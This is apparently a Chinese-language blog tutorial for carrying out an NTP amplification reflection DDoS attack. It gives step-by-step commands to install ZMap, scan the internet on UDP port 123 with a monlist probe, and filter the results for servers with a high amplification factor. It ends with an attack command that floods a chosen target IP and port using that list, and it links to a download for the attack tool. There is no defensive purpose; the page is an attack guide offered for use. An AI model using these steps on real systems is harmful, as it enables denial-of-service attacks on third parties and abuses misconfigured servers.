NTP放大反射攻擊掃描列表教程
阿新 • • 發佈:2018-12-02
1.升級所有包,改變軟體設定和系統設定,系統版本核心都升級
yum -y update
2.下載rpm包(區分centos6 與centos7 執行不同的命令)
centos6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos7:
wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpmsudo rpm -Uvh epel-release-7-11.noarch.rpm
3.安裝必要的依賴環境
yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c
--------------------------------------------掃描過濾列表-----------------------------------------------
4.安裝Zmap
wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz tar -zxvf v1.0.3.tar.gz cd /root/zmap-1.0.3 cd src/ make make install
ZMap安裝完成,可以執行如下命令測試:
zmap -p 80 -N 10 -B 1M -o - #很快,程式會輸出10個Internet上打開了80埠的主機的IP,你也可以換成22埠23埠試試。具體的用法可以參考ZMap官方文件。
5.開始掃描NTP放大列表
screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt 如果在掃描時,你與伺服器的會話不小心中斷。 你可以重新連線伺服器。 使用命令screen-r回到會話。 screen是將程式獨立執行在後臺,直到執行完成。
6.過濾列表
chmod 777 ntpchecker #新增許可權 screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1 #執行檢查 awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt #過濾列表
--------------------------------------------放大攻擊-----------------------------------------------
工具下載至本文:https://www.cnblogs.com/a1d4m/p/10051969.html
7.攻擊命令
chmod 777 ntp #賦予許可權 ./ntp 127.0.0.1 80 ntpamp.txt 100 -1 100